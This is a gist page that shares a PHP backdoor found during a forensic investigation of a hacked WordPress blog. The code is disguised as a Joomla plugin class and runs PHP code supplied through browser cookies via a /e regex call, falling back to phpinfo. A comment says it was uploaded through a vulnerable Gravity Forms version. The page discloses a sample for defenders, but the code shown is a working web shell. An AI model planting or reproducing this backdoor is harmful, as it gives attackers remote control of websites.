Skip to content

Instantly share code, notes, and snippets.

@jonaslejon
Created October 10, 2017 18:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jonaslejon/7145090a7df875ebbb9e19365f4c30f5 to your computer and use it in GitHub Desktop.
Save jonaslejon/7145090a7df875ebbb9e19365f4c30f5 to your computer and use it in GitHub Desktop.
WordPress backdoor found during forensic investigation of blog. Was located in folder wp-content/uploads/
<?php
/**
* @package Joomla.Plugin.System
* @since 1.5
*
*
*/
class PluginJoomla {
public function __construct() {
$jq = @$_COOKIE['ContentJQ3'];
if ($jq) {
$option = $jq(@$_COOKIE['ContentJQ2']);
$au=$jq(@$_COOKIE['ContentJQ1']);
$option("/438/e",$au,438); die();
}
else
phpinfo();die;
}
}
$content = new PluginJoomla;
@jonaslejon
Copy link
Author

Uploaded via a vulnerable version of Gravity Forms

@bigtenwebdesign
Copy link

I just found this on a hacked website.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment